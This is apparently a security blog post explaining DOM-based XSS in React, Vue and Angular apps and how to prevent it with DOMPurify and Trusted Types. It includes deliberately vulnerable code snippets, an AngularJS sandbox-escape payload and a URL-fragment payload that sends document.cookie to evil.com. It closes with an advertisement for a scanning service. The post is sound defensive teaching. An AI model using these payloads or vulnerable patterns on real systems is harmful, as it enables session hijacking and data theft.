A fintech startup shipped their React dashboard in Q3 last year. Solid team. TypeScript everywhere. CSP headers configured. Server-side output encoding on every API response. They did the work.
An attacker stole session tokens from 12,000 users through the URL hash fragment. The payload never touched the server. Not one WAF rule triggered. Not one log entry. The XSS lived and died entirely in the browser.
That's DOM XSS.
Why Server-Side Protections Are Blind Here
Traditional XSS — reflected, stored — follows a path everyone understands. Malicious input goes to the server, comes back unsanitized in HTML, browser executes it. The fix is well-documented: encode output, validate input, set Content-Security-Policy. Done. Except it's not done, because DOM XSS doesn't follow that path at all.
DOM-based XSS happens when JavaScript reads from an attacker-controlled source and writes to a dangerous sink — all client-side. The server never sees the payload. Your beautiful sanitization middleware? Irrelevant. Your WAF with 4,000 rules? Looking the wrong direction entirely.
Sources are places where attacker data enters the DOM:
window.location.hash— never sent to the serverwindow.location.search— sometimes sent, often parsed client-side before that mattersdocument.referrerwindow.name— survives cross-origin navigation, which is terrifyingpostMessagedata from other windows/iframeslocalStorage/sessionStorage
Sinks are where that data causes damage:
innerHTML,outerHTMLdocument.write()eval(),setTimeout(string),setInterval(string)element.setAttribute()on event handlers- jQuery's
.html(),$()with user input
Connect any source to any sink without sanitization and you've got DOM XSS. Simple concept. Incredibly easy to miss in code review.
The React Safety Net Has Holes
React escapes by default. Everyone knows this. JSX converts <script> into harmless text. Great. Teams hear this and assume they're safe. They're not.
// React's dangerouslySetInnerHTML — the name is a warning
// that roughly 40% of production React apps ignore
function UserProfile({ bio }) {
return <div dangerouslySetInnerHTML={{ __html: bio }} />;
}
// "But we sanitize on the server!" Cool.
// What about the markdown preview that parses client-side?
// What about the rich text editor output?
But dangerouslySetInnerHTML is at least obvious. The subtle ones hurt more.
// This looks harmless
function RedirectHandler() {
const params = new URLSearchParams(window.location.search);
const returnUrl = params.get('returnUrl');
// "It's just a redirect, what could go wrong?"
// javascript:alert(document.cookie) could go wrong
window.location.href = returnUrl;
}
// Or this gem from an actual production app
function DynamicWidget() {
const hash = window.location.hash.substring(1);
const config = JSON.parse(decodeURIComponent(hash));
// Attacker controls config entirely
// config.template gets injected into the DOM
document.getElementById('widget').innerHTML = config.template;
}
That second one passed code review at a company with a security team. Four people approved it.
Vue and Angular Aren't Immune Either
Vue's v-html directive is the exact same trap. Angular has bypassSecurityTrustHtml() which, again, the name screams danger but people use it anyway because the sanitizer "breaks their HTML." Yeah. That's what sanitizers do. They break malicious HTML.
<!-- Vue: "But I need to render rich content!" -->
<template>
<div v-html="userGeneratedContent"></div>
</template>
<!-- Angular: bypassing the one thing protecting you -->
<div [innerHTML]="sanitizer.bypassSecurityTrustHtml(userData)"></div>
The pattern is always the same. Framework provides a safety mechanism. Developer finds it inconvenient. Developer disables it. Vulnerability enters. Nobody notices for months.
postMessage: The Attack Vector Nobody Audits
This one's getting worse. Modern SPAs embed iframes everywhere — payment widgets, analytics dashboards, chat integrations, OAuth popups. They communicate via postMessage. And almost nobody validates the origin properly.
// How it usually looks in production
window.addEventListener('message', (event) => {
// TODO: add origin check
// ^^^ committed 18 months ago, still TODO
const data = JSON.parse(event.data);
document.getElementById('preview').innerHTML = data.html;
});
// What it should look like
window.addEventListener('message', (event) => {
if (event.origin !== 'https://trusted-widget.example.com') {
return; // not optional, not a TODO
}
// Still sanitize the data even from trusted origins
const clean = DOMPurify.sanitize(event.data.html);
document.getElementById('preview').innerHTML = clean;
});
Burp Suite's DOM Invader finds these in minutes. Attackers use it too. An iframe on a malicious page sends a crafted postMessage to your app's window — if your app is open in another tab — and the payload executes. No user interaction beyond visiting the attacker's page while logged into yours.
URL Fragment Attacks Keep Working
Hash fragments (#) are never sent to the server. HTTP spec, RFC 3986. Your server logs won't show them. Your WAF won't see them. Your server-side sanitization won't touch them. But your client-side router reads them constantly.
Older Angular.js apps using #/route style routing were catastrophically vulnerable. But it's not just legacy code. Any SPA that reads location.hash to configure state, restore UI, or parse deep links is at risk.
// Real pattern from a dashboard app
// URL: https://app.example.com/dashboard#view=<img src=x onerror=fetch('https://evil.com/steal?c='+document.cookie)>
const params = new URLSearchParams(location.hash.substring(1));
const viewName = params.get('view');
// This was used to set a breadcrumb label
document.querySelector('.breadcrumb-active').innerHTML = viewName;
// Game over
Fourteen characters of JavaScript in a URL fragment. That's all it took.
Client-Side Template Injection
Angular.js (version 1.x, still running on more sites than anyone wants to admit) had template injection that turned any reflected input into code execution. {{constructor.constructor('alert(1)')()}} bypassed the sandbox in every version before 1.6. Thousands of apps still run 1.5.
Modern frameworks handle this better, but client-side template engines outside the big three — Handlebars, Mustache, EJS on the client — still get fed user input directly. Server-side template injection gets all the conference talks. Client-side template injection gets actually exploited in the wild because nobody's scanning for it.
DOMPurify Isn't a Silver Bullet, But Use It Anyway
DOMPurify is the best client-side HTML sanitizer available. Use it. But understand what it does and doesn't do.
import DOMPurify from 'dompurify';
// Good: sanitize before innerHTML
element.innerHTML = DOMPurify.sanitize(untrustedHTML);
// Better: configure it tight
const clean = DOMPurify.sanitize(untrustedHTML, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
ALLOWED_ATTR: ['href', 'title'],
ALLOW_DATA_ATTR: false,
});
// DOMPurify won't help here — this isn't an HTML context
element.setAttribute('href', userInput); // javascript: URLs still work
element.style.cssText = userInput; // CSS injection
It handles HTML context. For URL context, you need URL validation. For JavaScript context — don't put user input in JavaScript context. Full stop. There's no sanitizer that makes eval(userInput) safe.
Finding DOM XSS Requires Different Tools
Traditional SAST tools look at server-side code. They find reflected and stored XSS. Most of them barely understand JavaScript data flow, and they definitely don't trace a value from location.hash through three function calls into innerHTML. Semgrep has some rules for it. CodeQL's JavaScript analysis is decent. But the false negative rate on DOM XSS with most scanners is embarrassingly high.
Chrome DevTools' Trusted Types API is the most underrated defense mechanism in browser security right now. It forces all dangerous sink assignments to go through a policy function. Deploy it and DOM XSS becomes structurally impossible — assuming you don't write a policy that just passes everything through.
// Content-Security-Policy header:
// require-trusted-types-for 'script';
// trusted-types myPolicy;
const policy = trustedTypes.createPolicy('myPolicy', {
createHTML: (input) => DOMPurify.sanitize(input),
createScriptURL: (input) => {
const url = new URL(input, window.location.origin);
if (url.origin !== window.location.origin) {
throw new Error('Blocked cross-origin script URL');
}
return url.toString();
},
});
// Now innerHTML requires a TrustedHTML object
// Raw strings throw a TypeError
element.innerHTML = policy.createHTML(untrustedData);
Google deployed Trusted Types across their apps and eliminated DOM XSS as a vulnerability class. Not reduced. Eliminated. The data's from their own security team — 60+ applications, zero DOM XSS after rollout.
Automated Security Scanning
Manual review catches maybe 30% of DOM XSS. Developers don't think like attackers, and data flow through a modern SPA with state management, routing, and third-party integrations is genuinely hard to trace by hand. ScanMyCode.dev performs automated security audits that trace these client-side data flows, flagging dangerous source-to-sink connections with exact file and line numbers plus concrete remediation steps.
What Actually Fixes This
Stop using innerHTML. Seriously. textContent exists. Template literals with DOM APIs exist. If you must insert HTML, DOMPurify goes between the untrusted data and the sink. No exceptions. Not "we'll add it later." Now.
Deploy Trusted Types. Even in report-only mode to start. You'll see every dangerous sink assignment in your CSP violation reports and probably want to cry at how many there are.
Validate postMessage origins. Validate URL schemes before assigning to href or location. Audit every use of dangerouslySetInnerHTML, v-html, and bypassSecurityTrustHtml — treat them like you'd treat a raw SQL query.
And scan your frontend code specifically for security issues. Backend security gets all the budget. Frontend JavaScript is where the users are, where the tokens live, where the sessions exist. Don't wait until 12,000 users get their sessions hijacked through a URL hash. Run a security audit on your codebase and get actionable results in 24 hours.